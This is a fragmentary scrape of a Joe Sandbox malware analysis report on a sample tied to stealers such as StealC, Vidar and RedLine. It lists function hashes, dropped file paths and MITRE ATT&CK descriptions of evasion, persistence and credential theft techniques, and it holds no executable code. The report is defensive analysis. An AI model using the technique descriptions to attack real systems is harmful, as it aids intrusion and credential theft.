Opcode Fuzzy Hash: aee682d23f3a71ea440656ac9299b23bbecf411dac3c7a4f22bb086a47f21b38
Instruction Fuzzy Hash: E8F09EB27082A09FC31617746C241AE3FA9DECB24130400DFD183C7251CE18890BC3E5

Function 067E67C0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b200040d9026be13cecf280218e9c13db71f299cc452519768c71eb8627dd2f
Instruction ID: 33a68b6644ee2cb1afc7df9831fe78d6fffbec36fc0a18f4be60f62c32af9a49
Opcode Fuzzy Hash: 8b200040d9026be13cecf280218e9c13db71f299cc452519768c71eb8627dd2f
Instruction Fuzzy Hash: CCF09031B44300AFC7208B68AC41F553BE6EB86724F05C166E624DB1E2D7A5D809C780

Function 067E8FC0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ab69fb032265eb5caa33ecf807d2e0ff768183923ba74c871f6aafd5a26623
Instruction ID: 2be43115072a09c837003b42f4256b76ba37ea44156e648ad199aa7c18acd962
Opcode Fuzzy Hash: 24ab69fb032265eb5caa33ecf807d2e0ff768183923ba74c871f6aafd5a26623
Instruction Fuzzy Hash: CFF0CDB1C08249DFDB40CFA0D8554BEBFB0EF1A201F0081D6E802EB350E6398A49DF41

Function 067E54F8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57292252ea9c44385b15ca90355e5dd3d52f11dbd11860259659990a6e47b73
Instruction ID: 4c5ffddd10e20b00e3c1008482efe695b1298bc48dbc5e3d268540d78b6c4932
Opcode Fuzzy Hash: e57292252ea9c44385b15ca90355e5dd3d52f11dbd11860259659990a6e47b73
Instruction Fuzzy Hash: 21F0B435A04749CFEBA5CE61D50077BBBF3BF84319F08886DD04647925D676E589CB40

Function 067E8341 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b13ec610a14bc860d6762e56a689b10300f85e4b1beb33fb8188083b7faaa05
Instruction ID: 52406ad95d805c97cb373bf45946a8261bd7a18891aa873ddc2e7cf846e3ce4f
Opcode Fuzzy Hash: 8b13ec610a14bc860d6762e56a689b10300f85e4b1beb33fb8188083b7faaa05
Instruction Fuzzy Hash: 00F0A731F101158B8B209ABAAC445BF7FB9AB8C2617084026E514D3140FB30891587E2

Function 067EAC70 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57599296704d7799c27a4a4e661190a4ba94c278d96ec91950e0bf00ff800c3
Instruction ID: cdca366bcf4a421f042f5751477f850ae7feb667edc063cd770cd5c13eee1aeb
Opcode Fuzzy Hash: e57599296704d7799c27a4a4e661190a4ba94c278d96ec91950e0bf00ff800c3
Instruction Fuzzy Hash: 52E022322042A09BC7162775AC285EE3FAEDFC6511304009BE146C3241CE284E4AC7EA

Function 067EADF8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78a35bbc0b9cb61d1a9b2876fb143121f218fc3570d65a88b9642ad088ab00a
Instruction ID: 8ad90d52fd879b27e32d65e611bf3d003f74bb7b7ef3b8ddc758783609db6720
Opcode Fuzzy Hash: e78a35bbc0b9cb61d1a9b2876fb143121f218fc3570d65a88b9642ad088ab00a
Instruction Fuzzy Hash: 0DE09231200211ABC3142A9BAC48B9E7ADFFBCD361B40452DE20ED3341CF6958458BB9

Function 067EC180 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48bac0ad4c70232976b91334947732a99d71b1c7cfcee30e5469a3f2ae1b3124
Instruction ID: d97268d74c9eb1f7a326cae443e46445797307baf50b879fc1f46b1370aba10c
Opcode Fuzzy Hash: 48bac0ad4c70232976b91334947732a99d71b1c7cfcee30e5469a3f2ae1b3124
Instruction Fuzzy Hash: 12F06D34502B018FE715DF66E408616BBF6FB88300700862EE88A82B14DF74A54ACF84

Function 067ECC38 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0032600ca9cdf099320c172b04072ef692d8bf119b844187154231890d726a6f
Instruction ID: ea42d70c1f95467d68e57356275d8d8baf20e388dcaed8095ae9b9189b6c02f3
Opcode Fuzzy Hash: 0032600ca9cdf099320c172b04072ef692d8bf119b844187154231890d726a6f
Instruction Fuzzy Hash: B7E09A32202252AFC602DF24F801AEABB67DB46210F016175E00097ED1CA7C0C4A8BE6

Function 067EB500 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18831b26a8fc950162441e94e140699835173e5b47d6e0d198e495e2857c7090
Instruction ID: cc0f0a1bdc97e43349b4b4c93ab697e23f6cb8f962f9f7c48612bbd3d77221e4
Opcode Fuzzy Hash: 18831b26a8fc950162441e94e140699835173e5b47d6e0d198e495e2857c7090
Instruction Fuzzy Hash: 4CF01535D0520CEFDB41DFB4D9489DDBFB9EB44200F5042AAE845E3250EA305B89CB81

Function 067EC120 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7648ea7f49d87ffba5e8fa97aa5c63f1eaff590f7e7926adef83b25a539b83b1
Instruction ID: 77bb6ab7175dcbd271b67ca5ef7adf7b412035ba2efc07a300245493cbbda508
Opcode Fuzzy Hash: 7648ea7f49d87ffba5e8fa97aa5c63f1eaff590f7e7926adef83b25a539b83b1
Instruction Fuzzy Hash: C5E0E5302007504FC314AB6DF80879E7BEAEFC5304F04042DD24687740CBA9AC09CBA5

Function 067E5698 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dcced03062bbf30ca5c51a7e7809e2e91c8e8895e89df65bfb24cee06ea5ad4
Instruction ID: 49817ea3cadbe290870038ee2428742c4b5fbb9856679286ed40508e6be52567
Opcode Fuzzy Hash: 3dcced03062bbf30ca5c51a7e7809e2e91c8e8895e89df65bfb24cee06ea5ad4
Instruction Fuzzy Hash: B3E0D8B250C3109FD304DB34E8018567BA8EF95320F19CC6EF480C7141E732D951C7A5

Function 067ECE88 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d5e14b88b1e0c233dde517acaab3754e4ec4fdf7bb1d23ad543ff7c07ab59e9
Instruction ID: 06b7ee5e57a20fe0e598c197bd024138bbbfb1f7c082397a0398a583d209aaad
Opcode Fuzzy Hash: 9d5e14b88b1e0c233dde517acaab3754e4ec4fdf7bb1d23ad543ff7c07ab59e9
Instruction Fuzzy Hash: 32E092B0505692EFD7439B20F845AA97F66DB46100B0114AAD88197AC1C66C4C49C796

Function 067EE280 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c160a806a2c9e5c8c01e9be3ec70e366114a4b6ac338286c50163148e1afeb6
Instruction ID: 668d02ad52a5a7577937f7bfec39208ccc98059f8728ac9302e2eab2b2cd7812
Opcode Fuzzy Hash: 3c160a806a2c9e5c8c01e9be3ec70e366114a4b6ac338286c50163148e1afeb6
Instruction Fuzzy Hash: 7CE0D871904652CFD74DAB10FD116587B66D75A640B020075D845676E0CA2C0D4987E7

Function 067EE1FF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf93e8fbf6e1bd9ce135bde5ead6a1eac9fc7d0631703e07cb23ac1fff06aea
Instruction ID: 0e8abb75b5e9df4be6a58a3b254590dc20caff937fb09421c4b927413c71365b
Opcode Fuzzy Hash: fdf93e8fbf6e1bd9ce135bde5ead6a1eac9fc7d0631703e07cb23ac1fff06aea
Instruction Fuzzy Hash: CFE0D871D49255FFCB01CF64ED0099D7BB6DA82100B2142DAD405E3390D6340F15C761

Function 067EE8F8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afdaed398ead1227e737eddddf568b9d0f50cad7a4bd1ded20d7573faaca620
Instruction ID: cfab5987cf33c772d761db1b6da7dde4222302bd818049f0500ae89524ac4772
Opcode Fuzzy Hash: 2afdaed398ead1227e737eddddf568b9d0f50cad7a4bd1ded20d7573faaca620
Instruction Fuzzy Hash: 7CE01739215254AFC7029F59C891C963FBABF4A61076550C6F9818FAB2C331ED26DBA0

Function 067EAC80 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538359e8bd043ae7973b880b53fc671058e08b1d13b56e774b1fc67d9922324e
Instruction ID: 40cb6c60bc06a43a8a546f72a85850f4e11b16b6b9f8b94876b66e6a95ce7ae3
Opcode Fuzzy Hash: 538359e8bd043ae7973b880b53fc671058e08b1d13b56e774b1fc67d9922324e
Instruction Fuzzy Hash: 05D05B71300625D786092779BC185AF779FEBC5661700056EE607D3340CF795D4587E9

Function 067EB510 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befd7b489dd8a4fdb7b3ea6b03c4021786e4a1e354d91de3bdcc8570481b9081
Instruction ID: bef150904b40d127ffb1f63aaf828ccba86758d9f6e56e62793f22a07eb12a1c
Opcode Fuzzy Hash: befd7b489dd8a4fdb7b3ea6b03c4021786e4a1e354d91de3bdcc8570481b9081
Instruction Fuzzy Hash: 7EE09275D0020CEFCB40DFE4E9849DDBBB9EB48300F1082AAD909A3200EB306B59DF80

Function 067EE210 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2e8f43f5502aabc63c4d3323a2c8d0812075c4d419060bf91365a457a9c97fa
Instruction ID: b34f3dc58e1de8de1b0ef8726be1614f333534fc562d04085aa8912fc117d6c3
Opcode Fuzzy Hash: d2e8f43f5502aabc63c4d3323a2c8d0812075c4d419060bf91365a457a9c97fa
Instruction Fuzzy Hash: 99D01271A00109FF8B40DFA8E90095DB7BAEB44204B1045A9D409E3340DA355E049BA5

Function 067EF8EA Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a417b80ed31127ec84d6e20daa20cbb38fca0daf4ec37126f183f0e585688c7c
Instruction ID: 783e220ffc9835508ffc8cf79c8a14e83bfb75e2d1f07284c08fb438688773e2
Opcode Fuzzy Hash: a417b80ed31127ec84d6e20daa20cbb38fca0daf4ec37126f183f0e585688c7c
Instruction Fuzzy Hash: 14C012367000202B0284A66C78142AE6AD7A3CC1A3385002EEA0EC3388CE649C868BA8

Function 067EDFD1 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2881977161.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_67e0000_6rxotqIg7H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 616119dc78eee64b7d9c89ca4ab059c4c838202ee8ca813e3ea0af50d7981774
Instruction ID: 99de9d597ad7d14d8311c43694f0de329b908c442cef4fde41c356066172cb67
Opcode Fuzzy Hash: 616119dc78eee64b7d9c89ca4ab059c4c838202ee8ca813e3ea0af50d7981774
Instruction Fuzzy Hash: AFC04C2158B7D19EEB021734880D9157E215F4761075504CBA6D1CA5A2C5110045C791

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OmnqazpM3P.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEHIDAKECFIEBGDHJEBKKKKJKK

C:\ProgramData\BGIJJKKJ

Windows Analysis Report
OmnqazpM3P.exe

C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\data\config.txt

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

